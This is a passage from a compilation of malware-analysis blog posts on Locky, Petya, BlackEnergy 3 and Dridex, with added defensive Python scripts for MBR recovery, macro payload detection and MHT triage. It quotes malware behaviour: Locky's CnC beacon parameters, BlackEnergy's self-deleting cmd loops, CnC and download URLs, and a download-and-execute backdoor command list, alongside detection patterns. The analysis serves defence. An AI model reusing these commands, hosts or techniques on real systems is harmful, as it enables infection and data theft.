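Because the trailer is appended rather than prepended, a scan only needs to read the last 0x344 bytes of each candidate file; matching the recovered ID against the one in “_HELP_instructions.txt” confirms which host the file was encrypted on.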

Finalizing the Infection

The executable will generate the “_HELP_instructions.txt” file for every folder path where it encrypted a file. It will also generate an equivalent Bitmap image for the instructions and store it so it becomes the user’s desktop background.

The executable then sends another action, “stats”, to the CnC server:

id=8B74B4AA40D51F4A&act=stats&path=c%3A&encrypted=1&failed=0&length=5912

  • path = the infected drive, “C:\”
  • encrypted = 1 (true)
  • failed = 0 (false)
  • length = number of files

The last step is to create the final encrypted registry value, the equivalent of the previous version’s “Completed = Yes”. That completes the description of the three encrypted registry values.

Last step of the encryption process
The analyzed executable also carries the domain generation algorithm that Locky has had since it appeared last year. It is used when the executable gets no response from the initially decrypted IP addresses.

How to Mitigate

Using ThreatSecure products, it is possible to block the download of the ransomware executable. The image below shows ThreatSecure Network detecting the malicious download via the GET request.

ThreatSecure in action

Prior to opening an e-mail attachment, the customer can use ThreatTrack’s dynamic malware analysis sandbox product, ThreatAnalyzer, to determine whether the file is malicious. ThreatAnalyzer logs its output in a file named “analysis.xml”; from that output you can see it observed the executable’s ransomware behaviors (IoCs).

Stored and Encrypted Files to .locky:

The sandbox detects that the files were encrypted, and the “Help Instructions” text file was also generated.

Help instructions text file

Network capture of Communication to CnC via post command to the CnC Server IP:

An outgoing connection is being initiated by Locky.

Network capture of communication to CnC
Process capture of Vssadmin.exe execution, deleting all backups:

Process capture of Vssadmin.exe execution

Setting an encrypted registry value “4Y0743Ngl” at HKCU\software:

Prior to file encryption, Locky enumerates the network resources of the machine, which can also be encrypted. ThreatAnalyzer was also able to see this behavior:

Locky enumerating network resources
As shown here, advanced threat defense products like those used in this analysis help avoid ransomware infection by catching the emerging threat before it can do any damage.

What’s more, the sandbox capabilities of ThreatAnalyzer also showed that it can log indications of compromise and potential malicious activities once a user accidentally opens the attachment – one more way users are guarded against increasingly popular ransomware attacks.

The post Understanding the Latest Version of Locky Ransomware appeared first on ThreatTrack Security Labs Blog.

A Glimpse at Petya Ransomware

Ransomware has become an increasingly serious threat. CryptoWall, TeslaCrypt and Locky are just some of the variants that have infected large numbers of victims. Petya is the newest strain, and the most devious among them.

Petya goes beyond encrypting individual files: it makes the system completely unusable, leaving the victim little choice but to pay the ransom, by encrypting the NTFS filesystem’s Master File Table (MFT) so the operating system can no longer load. The MFT is an essential structure of the NTFS file system: it contains a record for every file and directory on the logical volume, and each record holds the details the operating system needs to locate that file’s data, including the files it needs to boot.

Like much other malware, Petya is distributed via spear-phishing email, in this case a fake job application carrying a Dropbox link that supposedly points to a self-extracting CV. What it actually delivers is a self-extracting executable that later unleashes the malicious behavior.

Petya’s dropper

Petya’s infection behavior

Petya has two infection stages. The first is MBR infection and encryption-key generation, including the personal decryption code shown in the ransom message. The second is MFT encryption.

First Stage of Encryption

First infection stage behavior

The MBR infection is done through straightforward manipulation of \\.\PhysicalDrive0 with the help of the DeviceIoControl API. It first retrieves the physical location of the root volume \\.\C: by sending the IOCTL_VOLUME_GET_VOLUME_DISK_EXTENTS control code to the device driver, then queries the extended partition layout of \\.\PhysicalDrive0 with a further DeviceIoControl call.

GET_VOLUME_Data

The dropper encrypts the original MBR by XORing every byte with 0x37 and saves it for later use. It also writes 34 disk sectors filled with 0x37; right after those sectors comes Petya’s MFT-encrypting code, and the encrypted original MBR is stored at sector 56.
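Because the original MBR is only XORed with a single byte, it can be recovered from a disk image without the ransom key, and the filler sectors give a cheap structural indicator. The following added example (not code from the original post) reconstructs the sector layout described above and recovers the MBR from sector 56. It assumes 512-byte sectors and that the 0x37 filler occupies sectors 1 through 33, which the post does not spell out; the disk image it builds is constructed for the demonstration.

```python
"""Recover the original MBR from a Petya-infected disk image.

Added example, not from the original post.  Per the post, the dropper XORs the
original MBR with 0x37 and stores it at sector 56, and fills 34 sectors with
0x37 ahead of its own boot code.  Assumptions: 512-byte sectors, and that the
0x37 filler occupies sectors 1..33 (the post does not say which sectors)."""

from typing import Dict, Optional

SECTOR = 512
XOR_KEY = 0x37
ENCRYPTED_MBR_SECTOR = 56
FILLER_SECTORS = range(1, 34)
BOOT_SIGNATURE = b"\x55\xAA"


def read_sector(image: bytes, lba: int) -> bytes:
    start = lba * SECTOR
    if start + SECTOR > len(image):
        raise ValueError(f"sector {lba} beyond image end")
    return image[start:start + SECTOR]


def xor37(buf: bytes) -> bytes:
    """Single-byte XOR is its own inverse: the same call encrypts and decrypts."""
    return bytes(b ^ XOR_KEY for b in buf)


def has_boot_signature(sector: bytes) -> bool:
    return len(sector) == SECTOR and sector[510:512] == BOOT_SIGNATURE


def petya_indicators(image: bytes) -> Dict[str, bool]:
    """Cheap structural checks to run before attempting recovery."""
    filler_ok = all(set(read_sector(image, lba)) == {XOR_KEY} for lba in FILLER_SECTORS)
    recovered = xor37(read_sector(image, ENCRYPTED_MBR_SECTOR))
    return {
        "filler_sectors_are_0x37": filler_ok,
        "sector56_xor37_has_55aa": has_boot_signature(recovered),
    }


def recover_original_mbr(image: bytes) -> Optional[bytes]:
    """XOR sector 56 back with 0x37; None if it does not decode to a valid MBR."""
    mbr = xor37(read_sector(image, ENCRYPTED_MBR_SECTOR))
    return mbr if has_boot_signature(mbr) else None


def build_infected_image(original_mbr: bytes, total_sectors: int = 64) -> bytes:
    """Constructed test image laying sectors out as the post describes."""
    if not has_boot_signature(original_mbr):
        raise ValueError("original MBR must carry 0x55AA")
    sectors = [bytes(SECTOR)] * total_sectors
    sectors[0] = b"\xEB\xFE" + bytes(508) + BOOT_SIGNATURE   # stand-in malicious MBR
    for lba in FILLER_SECTORS:
        sectors[lba] = bytes([XOR_KEY]) * SECTOR
    sectors[34] = b"\xFA\x31\xC0" + bytes(SECTOR - 3)       # stand-in stage-2 loader
    sectors[ENCRYPTED_MBR_SECTOR] = xor37(original_mbr)
    return b"".join(sectors)


def sample_original_mbr() -> bytes:
    """Constructed clean MBR: fake boot code, one partition entry, 0x55AA."""
    boot_code = bytes(range(256)) + bytes(range(256))[:446 - 256]
    partition_entry = (b"\x80\x01\x01\x00\x07\xFE\xFF\xFF"
                       + (2048).to_bytes(4, "little") + (204800).to_bytes(4, "little"))
    return boot_code + partition_entry + bytes(48) + BOOT_SIGNATURE


if __name__ == "__main__":
    original = sample_original_mbr()
    image = build_infected_image(original)
    print(petya_indicators(image))
    print("recovered == original:", recover_original_mbr(image) == original)
```

On a real image the recovered 512 bytes can be written back to sector 0 (after imaging the disk) to make the volume bootable again; that restores the MBR only, not the MFT encrypted by the second stage.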

Infected disk view

Original Encrypted MBR

After infecting the MBR, it deliberately crashes the system by calling NtRaiseHardError. This triggers a BSOD; the system then restarts and boots from the infected MBR.

Code snippet triggering BSOD

BSOD

Inspecting a dump of the disk image, we found the fake CHKDSK screen, the ransom message and the ASCII skull art.

Dumped disk image

Second Infection Stage

The stage 2 infection code is 16-bit real-mode code that relies on BIOS interrupt calls.

On boot, Petya’s malicious code, located at sector 34, is loaded into memory. It first determines whether the system is already infected by checking whether the first byte of its marker sector is 0x0. If not yet infected, it displays the fake CHKDSK screen.

Fake CHKDSK

Once the screen below appears, the MFT has already been encrypted with the Salsa20 algorithm.

The victim will see this screen upon boot.

Ransom message and instructions

Petya Ransomware Page

The webpage where the victim obtains their personal decryption key is CAPTCHA-protected against bots and contains information about when the Petya ransomware project was launched, warnings about what not to do when recovering files, and an FAQ. The page is surprisingly user-friendly and shows the days left before the ransom price doubles.

Ransom page captcha

Petya's homepage

It also contains news feeds, including different blogs and news from AV companies warning about Petya.

News 1 Figure 13

News 2

They also provide a step-by-step process on how to pay the ransom, including instructions on how to purchase bitcoin. Support via web is included too in case the victim encounters problems in the transaction they’ve made. Petya’s ransom is a lot cheaper compared to other ransomware, too.

Petya web page 1

Petya web page 2

Petya web page 3

Petya web page 4

At Step 4 of the payment procedure, the "next" button is disabled until the operators have confirmed that they received the payment.

Petya support page

Petya’s support page

Below is a shot of ThreatTrack’s ThreatSecure Network dashboard catching Petya. Tools like ThreatSecure can detect and disrupt attacks in real time.

ThreatSecure Network catching Petya ransomware

The post A Glimpse at Petya Ransomware appeared first on ThreatTrack Security Labs Blog.

Breaking Down the Malware Behind the Ukraine Power Outage

Security researchers recently determined that the December power outage in Ukraine was caused by malware identified as an evolved version of BlackEnergy. This Trojan, dating back to 2007, was popular malware previously sold on Russian underground sites. Its design and architecture, however, have changed from performing simple HTTP DDoS attacks to a modular implementation. The latest version of the Trojan is capable of dropping rootkits, operating stealthily and executing backdoor commands received from a CnC server. It is also worth noting that it is widely speculated to be used by a group of attackers opposed to the government of Ukraine. Like Stuxnet, this BlackEnergy attack managed to sabotage an industrial sector, and the group responsible for the power outage has also been linked to the Trojan found in the mining and railway sectors of Ukraine.

Industrial systems, typically electrical, power, oil or water, use Industrial Control Systems (ICS) for control, supervision and data collection. Usually the ICS sit on an isolated network and, although still part of the organization's network, have little or no access to the internet. It is interesting how BlackEnergy managed to get inside these systems. Later in our analysis we will gain insight into what happened and how the group managed to infiltrate the network, starting from the initial stage of the attack via a phishing email.

This blog will focus on the analysis of BlackEnergy, parts of its core components, as well as how ThreatTrack’s ThreatAnalyzer and ThreatSecure provide us the information needed for data intelligence gathering. We’ll leave the analysis of the plugins that BlackEnergy utilized for another separate blog.

This research also aims to provide information on (1) how to emulate the attack by dissecting each stage of the process and (2) show how to utilize ThreatTrack’s newest line of threat identification products to mitigate and lessen the probability that these types of outbreaks might happen to you or your company. We’ll begin the analysis using the two samples that we have.

Md5: 97b7577d13cf5e3bf39cbe6d3f0a7732

  • Type: XLS (Microsoft Excel file)
  • First seen: 8/16/2015

Md5: e15b36c2e394d599a8ab352159089dd2

  • Type: DOC (Microsoft Document file)
  • First seen: 1/22/2016

BlackEnergy arrives via a spear-phishing email containing a malicious attachment. We can emulate this by attaching the samples we have to an email and sending it inside our network. There has been a lot of debate as to how the attachment(s) were executed since, for this version of BlackEnergy, no Office exploits have been seen. The only thing we know is that somehow a person inside executed the document file(s), whether through social engineering or as an insider.

Using ThreatTrack’s ThreatSecure Network and ThreatSecure Email, we can see that it was identified as something malicious when entering the network and also via email. The system changes that it will be performing can be seen under behaviors. The IP entry indicates the IP address of a remote server that it is trying to beacon to. Since this sample is already a few months old, and news of this attack has already been widespread, it only makes sense that the server is already down.

Fig 1: TSN catching the XLS attachment

Fig 2: TSN catching the DOC file

Fig 2.1: ThreatSecure Email (TSE)

Fig 2.2: Submit for Remediation

A cool feature of ThreatSecure Network is that, once a threat has been identified, any connection made to the target computer is monitored and can be seen in the ThreatSecure Network UI as Thressions™. Using these Thressions, users are alerted that an attack is happening or has happened and, depending on their settings, can block the network session. Fig 2.1 and Fig 2.2 above show that the file we are analyzing was caught by ThreatSecure Email and, at the user's request, can be submitted for remediation to remove the system changes made by the malware.

It is good practice to get an overview of what the malware does before getting deep into the assembly breakdown. There are a couple of ways to do this. You can use an infected machine and the tools available on the net to see what the malware does upon execution, but that takes time and effort to set up. There is a much faster and easier way: use a sandbox.

ThreatTrack's dynamic malware analysis sandbox, ThreatAnalyzer, reveals behaviors not normally seen in legitimate programs.

We started with the DOC file (e15b36c2e394d599a8ab352159089dd2) and the XLS (97b7577d13cf5e3bf39cbe6d3f0a7732), and both showed the same behavior:

  • Dropped the following files
    • %Temp%\vba_macro.exe
    • LNK file (Windows shortcut) pointing to the DOC file
    • %Application Data%\FONTCACHE.DAT
    • %User%\NTUSER.LOG
    • %Common Startup%\<adapter name>.LNK file
  • Created a named pipe
    • Pipe\{AA0EED25-4167-4CBB-BDA8-9A0F5FF93EA8}
  • Executed the following processes, some of them spawned multiple times
    • Vba_macro.exe
    • Cmd.exe
    • Attrib.exe
    • Ping.exe
    • Rundll32.exe %Application Data%\FONTCACHE.DAT, #1
    • %Program Files%\iexplore.exe
  • A screenshot showing what the document looks like when opened (DOC and XLS)
  • Created/modified the following registry values
    • Software\Microsoft\Internet Explorer\Main Check_Associations
    • Software\Microsoft\Internet Explorer\InformationBar FirstTime
    • Software\Microsoft\Internet Explorer\New Windows PopupMgr
    • Software\Microsoft\Internet Explorer\PhishingFilter Enabled
    • Software\Microsoft\Windows\CurrentVersion\Internet Settings\Cache Persistent
    • Software\Microsoft\Internet Explorer\TabbedBrowsing WarnOnClose
    • Software\Microsoft\Internet Explorer\TabbedBrowsing WarnOnCloseAdvanced
    • Software\Microsoft\Internet Explorer\Main DisableFirstRunCustomize
    • Software\Microsoft\Internet Explorer\Recovery NoReopenLastSession
    • Software\Microsoft\Internet Explorer\Main NoProtectedModeBanner
    • Software\Microsoft\Internet Explorer\TabbedBrowsing
    • Software\Microsoft\Internet Explorer\Recovery
  • Attempted to connect to a remote server
    • 5.149.254.114
  • Usage of RPCRT4.DLL

Fig 2.3: ThreatAnalyzer showing processes spawned by the DOC file

Looking a bit deeper

Now that we have an overview of what the samples are doing, we’ll do some classic reverse-engineering.

Although the two samples have different hashes and file formats (one is a Word document and the other an Excel sheet), they are, in a basic sense, the same.

Both have a malicious macro script embedded in them, and both try to deceive the user into disabling the macro security setting that is enabled by default. A fake Microsoft Office message appears in Russian, stating "This document was created by a newer version of Microsoft Office. Macros must be enabled to display the content of the document."

Depending on the security settings of Microsoft Office (high, medium or low), the image in Fig 4 is displayed. If a user chose to disable macro security or is on a low security level, the malicious scripts previously mentioned execute immediately.

Fig 3: Security on medium settings

Looking inside the VB macro, the code is fairly straightforward:

  • Declares a series of byte arrays
  • Saves them to a file located in the %TEMP% directory
  • Executes that file using the Shell function

Fig 4: Byte array declaration (MZ)

Fig 5: Byte array declaration (PE)

Fig 4 shows the values 77, 90 in array a(1). Converted to hex, that is 0x4D, 0x5A ("MZ"), a strong indicator that this sequence of arrays is an executable. This is further verified in Fig 6, where we see 80, 69 which, converted to hex, is 0x50, 0x45 ("PE").

Automatic execution is achieved by doing the following:

Fig 6: Byte array declaration (PE)

Fig 7. Deobfuscated macro

To put it simply, Fig 7 tells us that it saves the byte arrays into a file named vba_macro.exe in the %TEMP% directory and executes it using the Shell function.
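The MZ/PE check above can be automated over macro source (for instance the text olevba extracts). The following is an added example, not the macro from the page or any ThreatTrack tool: it collects the decimal literals from every VBA Array(...) call, reassembles them, and checks for an MZ header whose e_lfanew points at "PE\0\0". The sample VBA it builds is a constructed 68-byte stub, not a runnable program, and the function names are ours.

```python
import re
import struct

# Added example, not the macro from the page: pull decimal byte arrays out of
# VBA source and check whether they reassemble into a PE image (MZ at 0,
# e_lfanew at 0x3C pointing at "PE\0\0"). Function and sample names are ours.
ARRAY_RE = re.compile(r"Array\s*\(([^)]*)\)", re.IGNORECASE)


def extract_byte_arrays(vba_text: str) -> bytes:
    """Concatenate every Array(...) of integer literals, in source order.
    VBA line continuations (' _' + newline) inside the call are tolerated."""
    out = bytearray()
    for match in ARRAY_RE.finditer(vba_text):
        body = match.group(1).replace("_", " ")
        for token in body.split(","):
            token = token.strip()
            if token:
                out.append(int(token) & 0xFF)
    return bytes(out)


def find_pe_header(blob: bytes):
    """Return the e_lfanew offset if blob looks like a PE image, else None."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if blob[e_lfanew:e_lfanew + 4] == b"PE\x00\x00":
        return e_lfanew
    return None


def _as_vba_list(chunk: bytes) -> str:
    return ", ".join(str(b) for b in chunk)


def build_sample_vba() -> str:
    """Constructed sample: a 68-byte stub (not a runnable program) split across
    two arrays, the way the macro splits its payload into a(1), a(2), ..."""
    stub = b"MZ" + b"\x00" * 58 + struct.pack("<I", 64) + b"PE\x00\x00"
    first, second = stub[:40], stub[40:]
    return (
        "Dim a(1 To 2) As Variant\n"
        f"a(1) = Array({_as_vba_list(first)})\n"
        f"a(2) = Array({_as_vba_list(second[:20])}, _\n"
        f"    {_as_vba_list(second[20:])})\n"
    )


if __name__ == "__main__":
    blob = extract_byte_arrays(build_sample_vba())
    print(len(blob), "bytes, PE header at", find_pe_header(blob))
```

Checking e_lfanew rather than just the first two bytes avoids false positives on arrays that merely start with 77, 90; the same routine works on macros that spread the payload over dozens of arrays, since the arrays are joined in source order.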

Vba_macro.exe

According to the ThreatAnalyzer results, Vba_macro.exe spawns a file named FONTCACHE.DAT and several other processes. Looking inside the vba_macro executable, it appears heavily obfuscated at its entry point. It poses as a file with the original name packet.dll and exports several functions similar to those used by WinPcap. The odd thing is that although the function names are similar to those of the legitimate packet.dll in the system directory (assuming WinPcap is installed), the assembled code is garbage, except for the first function, which is probably the deobfuscator.

Fig 8: Note the similarities and the differences between the two.

The primary purpose of this file is to stage the next part of the infection process, which is to execute FONTCACHE.DAT.

Upon execution, this file reconstructs its code in an allocated region of memory and writes part of itself to a separate file, FONTCACHE.DAT, in the Application Data folder. The GetAdaptersInfo API is used to get the name of the network card in use, which becomes the file name of a .LNK, a Windows shortcut file that executes the program indicated in its path. In this case, it uses this method to ensure that the program it points to, %windir%\System32\rundll32.exe "C:\Documents and Settings\Administrator\Local Settings\Application Data\FONTCACHE.DAT", is always started on boot.

It deletes the credential named MCSF_Config before executing FONTCACHE.DAT using rundll32 with #1, indicating to execute the first ordinal function. This version of BlackEnergy uses the said credential to store its configuration, and in order to ensure that it will have the latest config, it deletes it prior to executing FONTCACHE.DAT.

Fig 9: CredDeleteA and ShellExecute

It runs the following shell commands:

cmd /s /c "for /L %i in (1,1,100) do (del /F "%TEMP%\vba_macro.exe" & ping localhost -n 2 & if not exist "%Application Data%\FONTCACHE.DAT" Exit 1)

cmd /s /c "for /L %i in (1,1,100) do (attrib +h "%TEMP%\vba_macro.exe" & del /A:h /F "%TEMP%\vba_macro.exe" & ping localhost -n 2 & if not exist "%Application Data%\FONTCACHE.DAT" Exit 1)
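Those two command lines are a useful detection pivot: a counted `for /L` loop, a forced delete and `ping localhost -n` used as a sleep rarely occur together in legitimate administration. The following is an added example (not from the original post or any ThreatTrack product) that flags that combination in process-creation command lines; the log lines and their field names are constructed for the example.

```python
import re

# Added example, not from the original post: flag the self-delete loop seen in
# the dropper's command lines from process-creation telemetry. The sample log
# lines and the "ts= image= parent= cmdline=" layout are constructed here.
SELF_DELETE_PATTERNS = [
    re.compile(r"for\s+/L\s+%\w+\s+in\s+\(", re.IGNORECASE),                 # counted loop
    re.compile(r"\bdel\s+(/A:h\s+)?/F\s+", re.IGNORECASE),                     # forced delete
    re.compile(r"ping\s+(localhost|127\.0\.0\.1)\s+-n\s+\d+", re.IGNORECASE), # ping as sleep
]


def is_self_delete_loop(cmdline: str) -> bool:
    """True when a command line combines a counted loop, a forced delete and a
    ping-based delay: the retry-until-gone idiom used by the dropper."""
    return all(p.search(cmdline) for p in SELF_DELETE_PATTERNS)


# Constructed sample telemetry (three process-creation events).
SAMPLE_LOG = [
    'ts=2016-01-22T10:00:01 image=cmd.exe parent=vba_macro.exe cmdline=cmd /s /c "for /L %i in (1,1,100) do (del /F "C:\\Temp\\vba_macro.exe" & ping localhost -n 2 & if not exist "C:\\AppData\\FONTCACHE.DAT" Exit 1)"',
    'ts=2016-01-22T10:00:02 image=cmd.exe parent=explorer.exe cmdline=cmd /c dir C:\\Users',
    'ts=2016-01-22T10:00:03 image=cmd.exe parent=vba_macro.exe cmdline=cmd /s /c "for /L %i in (1,1,100) do (attrib +h "C:\\Temp\\vba_macro.exe" & del /A:h /F "C:\\Temp\\vba_macro.exe" & ping localhost -n 2 & if not exist "C:\\AppData\\FONTCACHE.DAT" Exit 1)"',
]


def find_suspicious(lines):
    """Return the timestamps of events whose command line matches the idiom."""
    hits = []
    for line in lines:
        _, _, cmd = line.partition("cmdline=")
        if is_self_delete_loop(cmd):
            hits.append(line.split()[0].removeprefix("ts="))
    return hits


if __name__ == "__main__":
    for ts in find_suspicious(SAMPLE_LOG):
        print("self-delete loop at", ts)
```

Requiring all three components keeps the rule quiet on ordinary `del` commands; the parent process (here vba_macro.exe, launched from an Office document) is the natural second field to correlate on.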

FONTCACHE.DAT

FONTCACHE.DAT is executed using rundll32, the Windows utility for running code in compiled libraries. The argument #1 means run the first ordinal among its exported functions.

In an attempt to make a researcher’s life more difficult and in order to slow down the time to fully analyze the malware, the authors decided to obfuscate, again, this piece of malware.

We'll dig a bit deeper by trying to unpack the malware using old methods. Malware analysts commonly set breakpoints on memory-allocation APIs such as VirtualAlloc and LocalAlloc to see whether the malware is unpacking part of itself in memory; this particular sample, however, uses RtlAlloc and HeapAlloc to copy parts of itself little by little.

After decryption and some initializations, it will enter its main loop.

Fig 10: Chart of main function of FONTCACHE.DAT

(A) Attempts to read the current user's credential named MCSF_Config using the CredReadA API. What is read is actually an encrypted buffer written by the malware in function (B). This buffer is decrypted twice and contains information such as the CnC server URL, bot version, build type and other strings that are appended to locally gathered data.

Decrypted configuration

(B) Reads the data in the .CDATA section of FONTCACHE.DAT and overwrites the current user’s credential with that blob. This is achieved via CredWriteA API. This part also gathers local information about the target system and saves it for later use.

(C) Responsible for modifying the settings for Internet Explorer in the registry.

    • Software\Microsoft\Internet Explorer\Main Check_Associations
    • Software\Microsoft\Internet Explorer\InformationBar FirstTime
    • Software\Microsoft\Internet Explorer\New Windows PopupMgr
    • Software\Microsoft\Internet Explorer\PhishingFilter Enabled
    • Software\Microsoft\Windows\CurrentVersion\Internet Settings\Cache Persistent
    • Software\Microsoft\Internet Explorer\TabbedBrowsing WarnOnClose
    • Software\Microsoft\Internet Explorer\TabbedBrowsing WarnOnCloseAdvanced
    • Software\Microsoft\Internet Explorer\Main DisableFirstRunCustomize
    • Software\Microsoft\Internet Explorer\Recovery NoReopenLastSession
    • Software\Microsoft\Internet Explorer\Main NoProtectedModeBanner
    • Software\Microsoft\Internet Explorer\TabbedBrowsing
    • Software\Microsoft\Internet Explorer\Recovery

The function also creates a separate thread that sets up RPC communication over named pipes. This named pipe is how the different BlackEnergy 3 plugins communicate over the same network:

  • Pipe\{AA0EED25-4167-4CBB-BDA8-9A0F5FF93EA8}

(D) Creates a file named NTUSER.LOG. Currently, due to the way it was programmed, it only creates a 0 byte file.

(E) Forms the message that will be sent over to its CnC server. It contains the following information:

      • B_id: BotID, composed of <computername>_<unique bot identifier>
      • B_gen: generation of the bot, in this case "release"
      • B_ver: bot version, "2.2"
      • Os_v: target system OS version, "2600" (build number of Windows XP)
      • Os_type: OS type, "0"

Using CryptBinaryToString, it "encrypts" the data to be sent over the network and sends it to its CnC server as the body of a POST request.

POST data

(F) Creates an instance of Internet Explorer in the background using CoCreateInstance API. Since the settings of IE were already modified, no GUI will be seen, and it will be running under svchost.exe.

  • Using the GUID D30C1661-CDAF-11D0-8A3E-00C04FC9E26E, an empty instance of IE is created, as that CLSID is the default handler of the IWebBrowser2 interface.
  • Connects to http://5.149.254.114/Microsoft/Update/KC074913.php as an RPC client to send the information to a remote server.

RPC CnC connection

(G) Assuming a connection to the remote server has been made, it accepts 4 basic commands:

  • Delete – deletes a specified file
  • Ldplg – loads a plugin
  • Unlplg – unload a plugin
  • Dexec – download and execute a binary file

This makes it modular: it can download and execute different plugins depending on the type of attack to be performed. BlackEnergy has already been linked to several discovered plugins that also use the named pipe mentioned above for inter-process communication, locally or even across the local network.

These backdoor commands are believed to be responsible for the attack. The authors would upload new plugins, execute them and, after the damage was done, delete the traces. Known plugin capabilities include (but are not limited to):

      • Input/Output (IO) operations, deleting files and wiping away traces
      • Gathering system information
      • Keyloggers
      • Password stealers
      • Taking of screenshots
      • Remote access, SSH or RDP

After that, it sleeps for the number of seconds specified in its configuration data, then again attempts to send the information and accept new commands from the CnC server.

Summary

Fig 11: Simplified overall flow of BlackEnergy 3

The point of entry is a targeted spear-phishing email with a malicious attachment. Once executed, the malware can download and install new plugins. Communication between the core malware module and the plugins is achieved through RPC. This is employed since most ICS are on an isolated network: even if the target systems are on a network without an internet connection, the malware can still exfiltrate data, install new plugins and control the systems using RPC named pipes over SMB. Fig 11 shows a simplified diagram.

The post Breaking Down the Malware Behind the Ukraine Power Outage appeared first on ThreatTrack Security Labs Blog.

What’s New with Dridex

Credit: Christopher D. Del Fierro, Lead Malware Research Engineer, ThreatTrack Security

We have seen Dridex since 2014 and it is still active in the wild today. This research will be focusing on analyzing Dridex and on how it is able to remain undetected by most antivirus engines. For those not familiar with Dridex, it is a malspam (malware from a spam email) that targets Windows-operated systems with the intent to steal credentials and obtain money from a victim’s bank account.

Malware authors, not surprisingly, always try to come up with something new to avoid detection and make the researcher’s life more difficult. In a quick overview, there is nothing new in the infection sequence of Dridex. But authors of Dridex have made some upgrades and workarounds to avoid detection that we’ll discuss in detail below.

INFECTION CHAIN SUMMARY

Infection chain

IN-DEPTH ANALYSIS

As most Dridex samples come through spam, this new variant is no different. We recently caught a sample of its email attachment named "Payment Confirmation 98FD41.doc." Although the attachment has a .doc extension, it is not in DOC format but is actually a malformed MHT. MHT is an archive format for web pages, opened by default with Internet Explorer.

Malformed MHT viewed in Hiew

The malware author deliberately placed junk bytes before the string "MIME-Version", which marks the start of an actual MHT file. This was done to trick some antivirus scanner engines into classifying the file as a txt file or some other format rather than MHT.

This MHT file contains an embedded DOC file inside. The DOC file is the one that contains VBA (Visual Basic for Applications) macro codes responsible for downloading and executing Dridex unbeknownst to the user.

In most scenarios where computer systems are running Microsoft Windows, MHT files are loaded through Internet Explorer while DOC files are loaded by Microsoft Word, unless an advanced user changes its default application launcher settings. Because of those default settings, the malware author deliberately altered the extension of its malformed MHT file and changed it into .doc, fooling the system into loading it via Microsoft Word. And if macros are enabled in Microsoft Word, it will continue its infection routine and download and execute Dridex in the background.

As of this blog, executing the “Payment Confirmation 98FD41.doc” in a sandbox environment with macros enabled produces an error in VBA. This is because the site that it supposedly attempts to connect to is now down.

VBA error shown by Microsoft Word

Pressing Alt+F8 in Microsoft Word takes us to the Macros screen. As you can see, it has two macro functions, AutoOpen and FYFChvhfygDGHds.

Macros

Attempting to click "Edit" prompts for a password, which, of course, could be anything.

Macro password prompt

This makes things a bit more challenging, but we can extract the information using a more unconventional method.

Since “Payment Confirmation 98FD41.doc” is actually an MHT file that contains an embedded doc file, the first step is to rename it to an .eml extension “Payment Confirmation 98FD41.eml.” From there, we opened it using Microsoft Outlook (though whatever email client is currently being used will suffice). The embedded objects in “Payment Confirmation 98FD41.doc” have become attachments when renamed to .eml. Then we browsed the attachments and looked for a file that starts with the string “ActiveMime” when viewed in a hex editor.

Attachment renamed to .eml and opened in Outlook

This file format is MSO and cannot be read by the naked eye. Since this is old-school malware, we were lucky to have kept an old-school tool called UNMSO.EXE, which, as the name implies, unpacks the MSO. The tool's output is a "true" DOC file, and yes, it holds our malicious VBA macro code inside.
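The rename-to-.eml trick works because the file is a MIME message once the junk prefix is skipped, so the same triage can be scripted. The following is an added example (not from the original post or UNMSO.EXE) that flags a ".doc" with no OLE header but a "MIME-Version" header somewhere inside, parses the MHT from that offset with Python's email module, and returns every decoded part that starts with "ActiveMime". The sample MHT it builds is constructed, and its ActiveMime part is a stand-in blob, not a real packed DOC.

```python
import base64
import email
from email import policy

# Added example, not from the original post: triage a ".doc" that is really an
# MHT with junk before "MIME-Version", and pull out any base64 part whose
# decoded content starts with "ActiveMime" (the packed DOC). Names are ours.
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # genuine Word binary (.doc) header
ACTIVEMIME = b"ActiveMime"


def mime_offset(data: bytes):
    """Offset of the first 'MIME-Version' header, or None if absent."""
    idx = data.find(b"MIME-Version")
    return idx if idx >= 0 else None


def looks_like_disguised_mht(filename: str, data: bytes) -> bool:
    """A .doc with no OLE header that does contain a MIME header (at any
    offset, so a junk prefix does not hide it)."""
    return (filename.lower().endswith(".doc")
            and not data.startswith(OLE_MAGIC)
            and mime_offset(data) is not None)


def extract_activemime_parts(data: bytes) -> list:
    """Parse the MHT from its real start and return decoded ActiveMime blobs."""
    off = mime_offset(data)
    if off is None:
        return []
    msg = email.message_from_bytes(data[off:], policy=policy.default)
    found = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        payload = part.get_payload(decode=True) or b""
        if payload.startswith(ACTIVEMIME):
            found.append(payload)
    return found


def build_sample_mht() -> bytes:
    """Constructed sample: junk bytes, then a multipart MHT with a decoy HTML
    part and a base64 part whose decoded content starts with 'ActiveMime'."""
    packed = ACTIVEMIME + b"\x00\x01\x02sample-payload"      # stand-in, not a real MSO
    b64 = base64.b64encode(packed).decode()
    mht = (
        "MIME-Version: 1.0\r\n"
        'Content-Type: multipart/related; boundary="----=_NextPart_000"\r\n'
        "\r\n"
        "------=_NextPart_000\r\n"
        'Content-Type: text/html; charset="us-ascii"\r\n'
        "Content-Transfer-Encoding: 7bit\r\n"
        "\r\n"
        "<html><body>decoy</body></html>\r\n"
        "------=_NextPart_000\r\n"
        "Content-Type: application/x-mso\r\n"
        "Content-Transfer-Encoding: base64\r\n"
        "Content-Location: file:///C:/editdata.mso\r\n"
        "\r\n"
        f"{b64}\r\n"
        "------=_NextPart_000--\r\n"
    )
    return b"\x00JUNK\xff\xfe junk prefix " + mht.encode()


if __name__ == "__main__":
    sample = build_sample_mht()
    print("disguised MHT:", looks_like_disguised_mht("Payment Confirmation 98FD41.doc", sample))
    print("ActiveMime parts:", len(extract_activemime_parts(sample)))
```

Searching for the header at any offset is the point: a scanner that only inspects the first bytes is exactly what the junk prefix is meant to defeat. The extracted blob still needs an MSO unpacker before the VBA can be read.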

ActiveMime unpacked to a DOC file

Quickly examining the DOC file output, we can see naked strings “http://31.131.24.203/indiana/jones.php” and ”\yFUYIdsf.exe” in the body.

olevba output

We then used a tool called olevba.py (http://www.decalage.info/python/olevba) to extract VBA macro source codes and output its result into a text file.

Typical of VBA macro malware, it is obfuscated and contains a bunch of useless code in an attempt to confuse the researcher analyzing it. The list is pretty lengthy, so only the important lines are shown here.

